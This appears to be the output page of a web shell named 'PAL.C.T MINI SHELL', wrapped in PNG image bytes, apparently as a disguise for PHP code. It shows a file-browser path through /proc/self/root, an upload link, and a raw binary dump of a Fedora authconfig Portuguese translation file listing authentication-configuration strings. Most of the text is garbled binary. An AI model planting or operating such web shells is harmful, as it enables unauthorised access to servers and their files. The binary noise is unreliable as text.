php  IHDRwQ)Ba pHYs  sRGBgAMA aIDATxMk\Us&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨG;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j-$_q?qSXzG'ay

PAL.C.T MINI SHELL
files >> /proc/self/root/usr/share/locale/pt_BR/LC_MESSAGES/
upload
files >> //proc/self/root/usr/share/locale/pt_BR/LC_MESSAGES/authconfig.mo

Q N!pr#x##(!
/4=NW^f	ofyI*
6A
Q_qw	6E_b((x:;+1=Sg~" dE@%2?EKTg
*8OT]o


!&3@MRUX	akszR
h2 C S  !h";>#"z#!#"###$	$'$4$=$U$g$o$$t$%
%(%6H%%%[%%%&-&>&O&f&w&L{&&&&''
3'>'O'(g'0'0'1'$(,(.D()s([(_(+Y)6))#))**.*A*V*t*5* **@**8+,c+ +++S+V1,:,1,6,.,-.[-*-%-(-*.C/.'s.-./.$.</5[/=/1/:07<0-t0+0>0?
1)M1+w11*1M1O<2920252X-3-3)3$3'4)+4BU4&4,4.4#54?5&t5%5>5 61!6(S6;|6D636)170[7)7X7(8*880c88-88G`9F99:D.:4s::::4:'$;L;S,==='='=(=/>*1>\>
a>l>	~>>
>
>>k>M?l?
??????@@@ @wA~A>AAAAAB$BMB)BC2C?CZCuC	CC3C"C!D*D~JDDLDK3EEEEEEPEFk+FFFFFFFG G2G7GTGlG|G
GG!GGGGGH	HH(H-H0H6H
=H	KHUHjsHHHH	IIIyJJJ0KLLLM4.N3cNAN2N!O	.O8O
JOXOuOOOOODPUP)uPFPPQkQrQzQ#QQQQ
Q
RdRvRRRRRRR%
S40S?eS9S6ST T8=T1vTrTwU/ULUV$(VMVbVwVVV0VVBW*CWnWNW0W;X"AX:dXkXvYIY5YEZ<HZ=Z2Z%Z;[@X[U[,[3\>P\9\T\=]Q\]:]T]9>^/x^)^L^L_.l_9_ _8_X/`c`G`34a@hata;b0Zb#b9b>bP(c*yc1c<c7dHKd.d-dBd'4e7\e2eHe]fMnf,f4fAgt`gFg<h4Yhh0hhXuiIi&j#?jHcjHjj-
k8k:Kk>kG7V(X!?OQY-lHwz#u6%,3ZK/=5k[qhLIoJT.By_|s$Pr;St9cbgvx&mEdM{
\'U*>a<	^
~N4fin0pWe@])C1}F` DA2j"8R+: <Tab>/<Alt-Tab> between elements   |   <Space> selects   |  <F12> next screen*<URL><b>Authentication Configuration</b><b>Local Authentication Options</b><b>Other Authentication Options</b><b>Smart Card Authentication Options</b><b>User Account Configuration</b><dn><domain><lowest-highest><module><name><realm><server><servers><small><b>Tip:</b> Smart cards support logging into both local and centrally managed accounts.</small><small><b>Tip:</b> This is managed via /etc/security/access.conf.</small><workgroup>ADS Realm:Ad_min Servers:Admin Server:Advanced _OptionsAlertAll configuration files which were modified by the previous authentication configuration change will be restored from backup. Revert the changes?Allow offline _loginAut_hentication Method:AuthenticationAuthentication ConfigurationAuthentication module %s/pam_%s.so is missing. Authentication process might not work correctly.BackBad smart card removal action specified.Base DN:Cache InformationCancelCard Re_moval Action:Certificate _URL:Click this button if you did not download a CA certificate yet or you have not set the CA certificate up by other means.Control how the system verifies users who attempt to log inCreate _home directories on the first loginDo not configure _NTPDo_n't SaveDomain Administrator:Domain Controllers:Domain _administrator:Domain:Download CA CertificateEnable _fingerprint reader supportEnable _local access controlEnable _smart card supportError downloading CA certificateFingerprint authentication allows you to log in by scanning your finger with the fingerprint reader.Fingerprint readerHashing or crypto algorithm used for storing passwords of local usersHostname or ldap:// or ldaps:// URI pointing to the LDAP server.IPA R_ealm:IPA _Domain:IPA _Server:IPAv2IPAv2 SettingsIPAv2 domain join was not succesful. The ipa-client-install command failed.IPAv2 passwordIf the home directory of an user doesn't exist yet it will be created automatically on his first login.IgnoreJoin DomainJoin SettingsJoining Winbind DomainKDC:KerberosKerberos SettingsKerberos passwordLDAPLDAP Search _Base DN:LDAP SettingsLDAP _Server:LDAP authenticationLDAP passwordLocal accounts onlyLocal authorization is sufficientLockNISNIS SettingsNIS _Domain:NIS _Server:NIS passwordNextNoOkPasswordPassword:R_ealm:Realm:Require smart car_d for loginRestore the configuration files backed up before the previous configuration changeRevertSave SettingsSecurity Model:Server:Smart card authentication allows you to log in using a certificate and key associated with a smart card.Some of the configuration changes you've made should be saved to disk before continuing.  If you do not save them, then your attempt to join the domain may fail.  Save changes?Te_mplate Shell:Template Shell:The %s file was not found, but it is required for %s support to work properly.
Install the %s package, which provides this file.To connect to a LDAP server with TLS protocol enabled you need a CA certificate which signed your server's certificate. Copy the certificate in the PEM format to the '%s' directory.
Then press OK.To verify the LDAP server with TLS protocol enabled you need a CA certificate which signed the server's certificate. Please fill in the URL where the CA certificate in the PEM format can be downloaded from.Unable to initialize graphical environment. Most likely cause of failure
is that the tool was not run using a graphical environment. Please either
start your graphical user interface or set your DISPLAY variable.
Unknown password hashing algorithm specified, using sha256.Use DNS to _locate KDCs for realmsUse DNS to locate KDCs for realmsUse DNS to resolve hosts to realmsUse D_NS to resolve hosts to realmsUse Fingerprint readerUse IPAv2Use KerberosUse LDAPUse LDAP AuthenticationUse MD5 PasswordsUse NISUse Shadow PasswordsUse TLSUse Transport Layer Security extension for LDAP as defined by RFC-2830. It must not be ticked with ldaps server URI.Use WinbindUse Winbind AuthenticationUse _TLS to encrypt connectionsUse the "Join Domain" button to join the IPAv2 domain.User InformationWarningWhen enabled /etc/security/access.conf will be consulted for authorization of users access.WinbindWinbind ADS R_ealm:Winbind Domain Co_ntrollers:Winbind SettingsWinbind _Domain:Winbind authenticationWinbind passwordYesYou must provide ldaps:// server address or use TLS for LDAP authentication._Download CA Certificate..._Identity & Authentication_Join Domain..._KDCs:_Password Hashing Algorithm:_Password:_Security Model:_User Account Database:action to be taken on smart card removalauthenticate system accounts by local files onlyauthenticate system accounts by network servicesauthorize local users also through remote servicecachingcan only be run as rootcheck access.conf during account authorizationconfigures winbind to allow offline loginconfigures winbind to assume that users with no domain in their user names are domain usersconfigures winbind to assume that users with no domain in their user names are not domain usersconfigures winbind to prevent offline logincreate home directories for users on their first logindefault LDAP base DNdefault LDAP server hostname or URIdefault NIS domaindefault NIS serverdefault hesiod LHSdefault hesiod RHSdefault kerberos KDCdefault kerberos admin serverdefault kerberos realmdefault realm for samba and winbind when security=adsdefault smart card module to usedialog was cancelleddisable IPAv2 for user information and authentication by defaultdisable LDAP for authentication by defaultdisable LDAP for user information by defaultdisable MD5 passwords by defaultdisable NIS for user information by defaultdisable SSSD for authentication by default (still used for supported configurationsdisable SSSD for user information by default (still used for supported configurations)disable authentication with fingerprint readers by defaultdisable authentication with smart card by defaultdisable caching of user credentials in SSSD by defaultdisable caching of user information by defaultdisable hesiod for user information by defaultdisable kerberos authentication by defaultdisable shadowed passwords by defaultdisable use of DNS to find kerberos KDCsdisable use of DNS to find kerberos realmsdisable use of RFC-2307bis schema for LDAP user information lookupsdisable use of TLS with LDAP (RFC-2830)disable winbind for authentication by defaultdisable winbind for user information by defaultdisable wins for hostname resolutiondisplay Back instead of Cancel in the main dialog of the TUIdo not check access.conf during account authorizationdo not create home directories for users on their first logindo not display the deprecated text user interfacedo not prefer dns over wins or nis for hostname resolutiondo not require smart card for authentication by defaultdo not setup the NTP against the IPAv2 domaindo not start/stop portmap, ypbind, and nscddo not update the configuration files, only print new settingsenable IPAv2 for user information and authentication by defaultenable LDAP for authentication by defaultenable LDAP for user information by defaultenable MD5 passwords by defaultenable NIS for user information by defaultenable SSSD for authentication by default with manually managed configurationenable SSSD for user information by default with manually managed configurationenable authentication with fingerprint readers by defaultenable authentication with smart card by defaultenable caching of user credentials in SSSD by defaultenable caching of user information by default (automatically disabled when SSSD is used)enable hesiod for user information by defaultenable kerberos authentication by defaultenable shadowed passwords by defaultenable use of DNS to find kerberos KDCsenable use of DNS to find kerberos realmsenable use of RFC-2307bis schema for LDAP user information lookupsenable use of TLS with LDAP (RFC-2830)enable winbind for authentication by defaultenable winbind for user information by defaultenable wins for hostname resolutiongid range winbind will assign to domain or ads usershash/crypt algorithm for new passwordsjoin the IPAv2 domain as this accountjoin the winbind domain or ads realm now as this administratorload CA certificate from the URLlocal authorization is sufficient for local usersnames of servers to authenticate againstnever use SSSD implicitly even for supported configurationsopposite of --test, update configuration files with changed settingsprefer dns over wins or nis for hostname resolutionprobe network for defaults and print themrequire smart card for authentication by defaultrestore the backup of configuration filesrestore the backup of configuration files saved before the previous configuration changesave a backup of all configuration filessecurity mode to use for samba and winbindsetup the NTP against the IPAv2 domain (default)shadow passwordthe IPAv2 domain the system should be part ofthe character which will be used to separate the domain and user part of winbind-created user names if winbindusedefaultdomain is not enabledthe directory which winbind-created users will have as home directoriesthe group which winbind-created users will have as their primary groupthe realm for the IPAv2 domainthe server for the IPAv2 domainthe shell which winbind-created users will have as their login shelluid range winbind will assign to domain or ads usersunexpected argumentupdate all configuration filesusage: %s [options]use SSSD implicitly if it supports the configurationworkgroup authentication servers are inProject-Id-Version: pt_BR
Report-Msgid-Bugs-To: 
POT-Creation-Date: 2012-05-02 17:32+0200
PO-Revision-Date: 2012-05-21 01:26-0400
Last-Translator: gcintra <gcintra@redhat.com>
Language-Team: Brazilian Portuguese <trans-pt_br@lists.fedoraproject.org>
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Language: pt-BR
Plural-Forms: nplurals=2; plural=(n > 1);
X-Generator: Zanata 1.5.0
X-Poedit-Country: BRAZIL
X-Poedit-Language: Portuguese
 <Tab>/<Alt-Tab> entre elementos   |   <Espaço> seleciona   |  <F12> próxima tela*<URL><b>Configuração da autenticação</b><b>Opções de Autenticação Local</b><b>Outras Opções de Autenticação</b><b>Opções de Autenticação do Smart Card</b><b>Configuração de Conta de Usuário</b><dn><domínio><mínimo-máximo><módulo><nome><domínio><servidor><servidores><small><b>Dica:</b>Suporte de Smart cards registrando-se em contas gerenciadas local e centralmente</small><small><b>Dica:</b> Esta é gerenciada via /etc/security/access.conf.</small><grupo de trabalho>Domínio ADS:Servidores Ad_min:Servidor de administração:Opções_Avançadas:AlertaTodos os arquivos de configuração que tenham sido modificados pela mudança de configuração de autenticação anterior, serão restaurados a partir da cópia de segurança. Reverter as mudanças?Permitir login_ offlineMétodo de Aut_enticação:AutenticaçãoConfiguração da autenticaçãoO módulo de autenticação %s/pam_%s.so está faltando. O processo de autenticação pode não funcionar corretamente.VoltarAção inadequada de remoção de smart card foi especificada.Base do DN :Informações do CacheCancelarAção ao rem_over o cartão:URL_ do Certificado:Clique neste botão se você não baixou o certificado CA ainda ou se você ainda não definiu o certificado CA por outros meios.Controla o modo como o sistema verifica os usuários que tentam se autenticarCriar diretórios _home no primeiro loginNão configure _NTP_Não SalvarAdministrador do domínio:Controladores de domínio:Administrador_ do domínio:Domínio:Baixar certificado CAHabilitar suporte de leitor de _impressão digital Habilitar controle de acesso_localHabilitar suporte a _Smart Cards Erro ao baixar o certificado CAA autenticação com impressão digital permite que você realize o login ao ser escaneado com o leitor de impressão digital.Leitor de impressão digitalalgoritmo hash/criptografado usado para armazenar senhas de usuários locaisNome da máquina ou URI ldap:// ou ldaps:// apontando para o servidor LDAP.IPA T_erritório:IPA _Domínio:IPA _Servidor:IPAv2Configurações do IPAv2O domínio do IPAv2 não foi bem sucedido. O comando  ipa-client-install falhou.Senha IPAv2Se o diretório home de um usuário não existir ainda, ele será criado automaticamente no primeiro login.IgnorarAssociar-se ao domínioConfigurações de associaçãoAssociando ao domínio WinbindKDC:KerberosConfigurações do KerberosSenha do KerberosLDAPDN _base para pesquisa LDAP:Configurações do LDAPServidor_ LDAP:Autenticação LDAPSenha LDAPSomente contas locaisAutorização local é suficienteBloquearNISConfigurações do NISDomínio_ NIS:Servidor_ NIS:senha NISPróximoNãoOkSenhaSenha:T_erritório:Domínio:Requer smart car_d para loginRestaurar os arquivos de configuração feitos cópia de segurança antes da configuração anterior mudarReverterSalvar configuraçõesModelo de segurança:Servidor:A autenticação com um smart card permite que você realize o login usando um certificado e uma chave associada a um smart card.Algumas das mudanças que você fez nas configurações devem ser salvas no disco antes de continuar.  Se você tentar associar-se a um domínio sem ter salvo as mesmas pode vir a ter problemas.  Salvar as mudanças?Te_mplate shell:Template shell:O arquivo %s não foi encontrado, mas é necessário para que o suporte a %s funcione corretamente.
Instale o pacote %s, o qual contém este arquivo.Para se conectar a um servidor LDAP usando o protocolo TLS habilitado, você precisa do certificado CA que assinou o certificado do seu servidor. Copie o certificado no formato PEM para o diretório %s.
Então, pressione OK. Para verificar o servidor LDAP com o protocolo TLS habilitado você precisa do certificado CA que assinou o certificado do servidor. Por favor, insira a URL de onde o certificado CA pode ser baixado no formato PEM.Não foi possível inicializar ambiente gráfico. Normalmente por conta de uma falha
é que a ferramenta não foi executada utilizando um ambiente gráfico. Por favor ou 
inicie sua interface gráfica de usuário ou configure a variável DISPLAY.
O algoritmo hash especificado para senha é desconhecido, utilizando sha256.Usar o DNS para _localizar os KDCs para os domíniosUsar o DNS para localizar os KDCs para os domíniosUsar o DNS para resolver os nomes das máquinas para os domíniosUsar o D_NS para resolver os máquinas para realmsUsar leitor de impressão digitalUse IPAv2Utilizar KerberosUtilizar LDAPUtilizar autenticação LDAPUtilizar senhas MD5Utilizar NISUtilizar senhas shadowUtilizar TLSUsar extensão de camada de transporte segura para o LDAP como definido pelo RFC-2830. Não deve ser definido com a URI do servidor LDAP.Utilizar WinbindUtilizar autenticação WinbindUtilizar _TLS para criptografar conexõesUse o botão "Junte-se ao Domínio" para se unir ao domínio do IPAv2.Informações do UsuárioAvisoQuando habilitado, o /etc/security/access.conf será consultado para a autorização de acesso do usuário.WinbindT_erritório do Winbind ADS:Co_ntroladores de Domínio Winbind:Configurações do WinbindDomínio_Winbind:Autenticação winbindSenha WinbindSimVocê precisa fornecer o endereço do servidor ldaps:// ou usar o TLS para a autenticação do LDAP._Baixar certificado CA..._Identidade & Autenticação_Associar-se ao domínio..._KDCs:_Algoritmo hash da _senha:_Senha:_Modelo de segurança:_Banco de Dados da Conta de Usuário:ação a ser executada na remoção de um smart cardautenticação de contas de sistema somente por arquivos locaisautenticação de contas de sistema por serviços de redeautorizar usuários locais também por serviço remotocachesó pode ser executado como rootverificar o access.conf durante a autorização da contaconfigura o winbind para permitir o login offlineconfigura o winbind para assumir que usuários sem o domínio em seus nomes de usuário são usuários do domínioconfigura o winbind para assumir que usuários sem o domínio em seus nomes de usuário não são usuários do domínioconfigura o winbind para evitar o login offlinecriar diretórios home para usuários que estejam efetuando o primeiro loginbase DN padrão do LDAPnome ou URI do servidor LDAP padrãodomínio NIS padrãoservidor NIS padrãoLHS hesiod padrãoRHS hesiod padrãoKDC kerberos padrãoservidor de administração padrão do kerberos domínio padrão do kerberosdomínio padrão para o samba e para o winbind quando security=adsmódulo smart card a ser usado por padrãodiálogo foi canceladoDesabilite o IPAv2 para informações de usuário e autenticação por padrãodesabilitar LDAP para autenticação por padrãodesabilitar LDAP para informações do usuário por padrãodesabilitar senhas MD5 por padrãodesabilitar NIS para informações do usuário por padrãodesabilitar SSSD para autenticação por padrão (continua sendo utilizado para configurações suportadas)desabilitar SSSD para informações do usuário por padrão (continua sendo utilizado para configurações suportadas)desabilitar autenticação com leitores de impressão digital por padrãodesabilitar autenticação com smart card por padrãodesabilitar o cache de de credenciais do usuário no SSSD por padrãodesabilitar o cache de informações do usuário por padrãodesabilitar hesiod para informações do usuário por padrãodesabilitar autenticação do kerberos por padrãodesabilitar senhas shadow por padrãodesabilitar o uso do DNS para localizar os KDCs do kerberosdesabilitar o uso do DNS para localizar os domínios do kerberosdesabilitar o uso do esquema RFC-2307bis para busca de informações do usuário LDAPdesabilitar o uso do TLS com LDAP (RFC-2830)desabilitar winbind para autenticação por padrãodesabilitar winbind para informações do usuário por padrãodesabilitar o wins para a resolução do nome da máquinaexibir Voltar ao invés de Cancelar no diálogo principal da interface em modo textonão verificar o access.conf durante a autorização da contanão criar diretórios home para usuários que estejam efetuando o primeiro loginnão exibir a interface obsoleta de usuário em modo textonão dar preferência ao dns em relação ao wins ou nis para a resolução de nomesnão solicitar smart card para autenticação por padrãonão configure o NTP contra o domínio do IPAv2não iniciar/parar portmap, ypbind e nscdnão atualizar os arquivos de configuração, apenas mostrar as alteraçõesHabilite o IPAv2 para informações de usuário e autenticação por padrãohabilitar LDAP para autenticação por padrãohabilitar LDAP para informações do usuário por padrãohabilitar senhas MD5 por padrãohabilitar NIS para informações do usuário por padrãohabilitar SSSD para autenticação por padrão com configuração gerenciada manualmentehabilitar SSSD para informações do usuário por padrão com configuração gerenciada manualmentehabilitar autenticação com leitores de impressão digital por padrãohabilitar autenticação com smart card por padrãohabilitar o cache de credenciais do usuário no SSSD por padrãohabilitar o cache de informações do usuário por padrão (desabilitar automaticamente quando o SSSD for utilizado)habilitar hesiod para informações do usuário por padrãohabilitar autenticação do kerberos por padrãohabilitar senhas shadow por padrãohabilitar o uso do DNS para localizar os KDCs do kerberoshabilitar o uso do DNS para localizar os domínios do kerberosativar o uso do esquema RFC-2307bis para busca de informações do usuário LDAPhabilitar o uso do TLS com LDAP (RFC-2830)habilitar winbind para autenticação por padrãohabilitar winbind para informações do usuário por padrãohabilitar o wins para a resolução do nome da máquinaintervalo de gid utilizado pelo winbind para o domínio ou usuários adsalgoritmo hash/criptografado para novas senhasjunte-se ao domínio do IPAv2 como esta contareunir-se ao domínio winbind ou ads agora como este administradorcarregar certificado CA a partir da URLautorização local é suficiente para usuários locaisnomes dos servidores que realizam a autenticaçãonunca utilizar SSSD implicitamente mesmo para configurações suportadascontrário de --test, atualiza os arquivos de configuração com as configurações alteradasdar preferência ao dns, ao invés do wins ou nis para a resolução de nomesdetectar valores padrão da rede e exibi-lossolicitar smart card para autenticação por padrãorestaurar uma cópia de segurança dos arquivos de configuraçãorestaurar uma cópia de segurança dos arquivos de configuração salva antes das configurações anteriores mudaremsalvar uma cópia de segurança de todos os arquivos de configuraçãomodo de segurança para a utilização do samba e do winbindconfigure o NTP contra o domínio do IPAv2 (padrão)senha shadowO domínio do IPAv2 que o sistema deve ser partequal caractere será usado para separar o domínio e a parte do usuário dos nomes de usuário criados pelo winbind se o winbindusedefaultdomain não estiver habilitadoo diretório que os usuários criados pelo winbind terão como seus diretórios pessoaiso grupo que os usuários criados pelo winbind terão como grupo primárioO território para o domínio do IPAv2o servidor para o domínio do IPAv2o shell que os usuários criados pelo winbind terão como shell de loginintervalo de uid utilizado pelo winbind para o domínio ou usuários adsargumento inesperadoatualizar todos os arquivos de configuraçãouso: %s [opções]usar SSSD implicitamente caso ele suporte a configuraçãoos servidores de autenticação do grupo de trabalho estão em
y~or5J={Eeu磝QkᯘG{?+]ן?wM3X^歌>{7پK>on\jyR g/=fOroNVv~Y+NGuÝHWyw[eQʨSb>>}Gmx[o[<{Ϯ_qF vMIENDB`